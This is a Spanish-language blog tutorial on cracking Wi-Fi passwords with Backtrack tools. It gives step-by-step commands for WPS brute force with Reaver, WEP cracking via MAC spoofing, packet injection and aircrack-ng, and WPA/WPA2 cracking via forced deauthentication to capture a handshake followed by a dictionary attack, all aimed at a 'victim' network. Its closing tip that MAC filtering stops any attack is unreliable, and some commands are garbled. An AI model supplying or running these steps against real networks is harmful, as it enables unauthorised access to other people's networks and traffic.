WPA2-PSK:
Bueno el siguiente tutorial muestra como romper una clave WPA2-PSK,siempre que quieren aumentar la seguridad de su red inalámbrica ocupan WPA2-PSK un método de encriptación más robusto que WEP. Básicamente la diferencia es que las claves WPA2-PSK es que soporta claves hasta 63 caracteres alfanuméricos, y dependiendo de la pre-share-key, el sistema genera nuevas claves que transmite al resto de los equipos, lo cual dificulta la acción de cifrado.
Ahora vamos a romper claves WPA2-PSK:
Tutorial
Tutorial
Lo primero que debemos hacer es ejecutar el comando:
#airmon-ng start wlan0
El segundo comando a ejecutar es el siguiente:
Con este comando buscamos las redes disponibles y su información en cuanto a BSSID,PWR, Beacons,#Data ,Channel,etc.
Finalmente ejecutamos el siguiente código:
#Reaver –i mon0 –b BSSID -c canal nombre red
(en la imagen se muestra de acuerdo a la red a desencriptar ,obteniendo el BSSID)
Ya ejecutado el comando comienza a trabajar y a desencriptar..!!!
Finalmente esperamos y nos da la siguiente información, en la cual nos entrega la contraseña de la red a buscar la que seria:
WPA PSK: ‘jn20110x’, obviamente la escribiremos sin las comillas.
Bueno, eso seria todo, solo en 3 sencillos pasos.
Cabe señalar que el tiempo de espera es entre 10 minutos en adelante, depende la intensidad de la señal.
CONSEJO BTA
Bueno como consejo BTA,te recomendamos entrar a la configuración de tu router y realizar un registro por MAC de los equipos que navegan en tu LAN, así te evitas de cualquier tipo de ataque y vuelves tu red mas segura.
Para romper contraseñas por WEP
1. Iniciar Backtrack 4 con startx2. Para verificar si la tarjeta de red es reconocida se debe ejecutar el comando
Iwconfig
3. Activación del modo monitor y asignación de una MAC conocida para la tarjeta inalámbrica
Airmon-ng stop wlan0
Macchanger --mac 00:11:22:33:44:55 wlan0
Airmon-ng start wlan0 11 (el 11 corresponde al canal del modem que se quiere atacar.)
4. Para averiguar los datos de la red inalámbrica que se quiere atacar, tales como la MAC, el SSID, el canal, etc..
Airodump-ng wlan0
ESSID (corresponde al SSID)
BSSID (corresponde a la MAC del modem que se quiere atacar)
Para detener la captura, utilizamos CONTROL+C
5. Para comenzar a generar el archivo con los paquetes
Airodump-ng –w captura –c11 wlan0
(el c11 indica que el canal del modem es el 11 y captura es el nombre del archivo en donde se guardarán los paquetes)
6. Para crear la asociación entre la tarjeta y el modem, utilizamos el comando
Aireplay-ng -1 0 –e NOMBRE_SSID –a MAC_VICTIMA –h MI_MAC wlan0
7. Para inyectar paquetes a la red, utlizamos
Aireplay-ng -3 –b MAC_VICTIMA –h MI_MAC wlan0
Se deben capturar mas de 60000 paquetes…
8. Para identificar la contraseña WEP
Aircrack-ng captura-01.cap
Y listo!!!
Para romper WPA/WPA2
1. Iniciar Backtrack 4 con startx
2. Para verificar si la tarjeta de red es reconocida se debe ejecutar el comando
Iwconfig
3. Activación del modo monitor y asignación de una MAC conocida para la tarjeta inalámbrica
Airmon-ng stop wlan0
Macchanger –mac 00:11:22:33:44:55 wlan0
Airmon-ng start wlan0 11 (el 11 corresponde al canal del modem que se quiere atacar.)
4. Para averiguar los datos de la red inalámbrica que se quiere atacar, tales como la MAC, el SSID, el canal, etc..
Airodump-ng wlan0
ESSID (corresponde al SSID)
BSSID (corresponde a la MAC del modem que se quiere atacar)
Para detener la captura, utilizamos CONTROL+C
5. Airodump-ng –w captura –c 11 - -bssid MAC_VICTIMA wlan0
(c11 corresponde al canal del modem)
6. En otra ventana… para generar la desautenticación del equipo asociado y con ello generar el HANDSHAKE requerido
Aireplay-ng -0 1 –a MAC_VICTIMA –c MAC_PC_CONECTADO wlan0
7. Cuando se tenga el HANDSHAKE=1 entonces…
ejemplo:
cd /media/nom_usb/ … ubicación del archivo diccionario
aircrack-ng –w diccionario.lst /root/*.cap
y listo…
No hay comentarios:
Publicar un comentario